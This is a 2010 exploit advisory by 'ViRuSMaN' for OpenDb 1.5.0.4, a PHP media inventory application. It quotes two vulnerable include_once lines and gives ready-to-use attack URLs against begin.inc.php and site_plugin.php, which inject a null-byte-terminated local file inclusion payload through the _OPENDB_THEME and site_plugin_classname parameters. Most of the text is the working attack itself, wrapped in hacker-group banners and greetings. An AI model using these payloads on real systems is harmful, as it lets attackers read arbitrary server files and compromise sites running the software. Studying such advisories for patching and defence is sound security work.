OpenDb 1.5.0.4 Multiple LFI Vulnerability :

Date : 2010-01-23 Author : ViRuSMaN
==============================================================================
__ __ __ __ __ __
/  /    / / /  / 
/ / \_/ /    / / / / \_/ / 
/ /  _ /    / / / /  _ /  
/_/ \_ \__/ /_/ \_

==============================================================================
[] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[] Script: [ OpenDb ]
[] Language: [ PHP ]
[] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[] Founder: [ ViRuSMaN <[email protected] - [email protected]> ]
[] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
#~ [C:AppServwwwScriptsopendbincludeegin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
#~[C:AppServwwwScriptsopendbfunctionssite_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################

C1

 

C2

 

C3